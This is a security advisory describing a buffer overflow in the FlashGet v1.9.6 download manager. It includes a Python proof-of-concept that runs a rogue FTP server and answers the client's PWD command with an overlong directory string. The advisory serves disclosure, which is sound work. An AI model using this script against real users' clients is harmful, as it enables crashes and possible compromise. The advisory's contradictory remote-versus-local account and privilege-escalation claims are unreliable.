Document Title: =============== FlashGet v1.9.6 - Remote Buffer Overflow Vulnerability Date: ===== 2020-05-02 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2248 VL-ID: ===== 2248 Common Vulnerability Scoring System: ==================================== 8.4 Vulnerability Class: ==================== Buffer Overflow Introduction: ============= FlashGet is a leading download manager and has the highest amount of users on the internet. It uses MHT technique, supports various protocols and has excellent document management features. FlashGet is a freeware without any adware or spyware. FlashGet v1.9.6 supports HTTP,FTP,BT and eMule protocols. The new P4S technique should highly accelerate the downloading process. IE6,IE7,IE8 and Firefox are supported. (Copy of the Homepage: http://www.flashget.com/en/download.htm ) Abstract: ========= An independent vulnerability laboratory researcher discovered a remote buffer overflow vulnerability in the FlashGet v1.9.6 software. Report-Timeline: ================ 2020-05-03: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A remote buffer overflow vulnerability has been discovered in the official FlashGet v1.9.6 software. The bufer overflow allows to overwrite registers of the process to compromise the file-system by elevates local process privileges. The buffer overflow is located in the `current directory path` function affecting the buffer size. Remote attackers with access to the software are able to overflow after login to compromise the local file-system or process registers. Exploitation of the buffer overflow vulnerability requires a low privilege or restricted system user/guest account without user interaction. Successful exploitation of the vulnerability results in overwrite of the active registers to compromise of the file-system or local software process. Vulnerable Module(s): [+] current directory path Proof of Concept: ================= The remote buffer overflow software vulnerability can be exploited by remote attackers with local low privileged user accounts or guest without user interaction. For security demonstration or to reproduce the remote buffer overflow vulnerability follow the provided information and steps below to continue. PoC: Exploit (Python) #!/usr/bin/python # Exploit Title: FlashGet v1.9.6 - Remote Buffer Overflow Vulnerability from time import sleep from socket import * res = [ '220 WELCOME!! :xrn', '331 Password required for %s.rn', '230 User %s logged in.rn', '250 CWD command successful.rn', '257 "%s/" is current directory.rn' # <-- %s B0f :x ] buf = 'A' * 332 s = socket(AF_INET, SOCK_STREAM) s.bind(('0.0.0.0', 21)) s.listen(1) print '[+] listening on [FTP] 21 ...n' c, addr = s.accept() c.send(res[0]) user = '' for i in range(1, len(res)): req = c.recv(1024) print '[*][CLIENT] %s' % (req) tmp = res[i] if(req.find('USER') != -1): req = req.replace('rn', '') user = req.split('x20', 1)[1] tmp %= user if(req.find('PASS') != -1): tmp %= user if(req.find('PWD') != -1): tmp %= buf print '[*][SERVER] %s' % (tmp) c.send(tmp) sleep(5) c.close() s.close() print '[+] DONE' Credits: ======== Milad Karimi - https://www.vulnerability-lab.com/show.php?user=Milad+Karimi Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™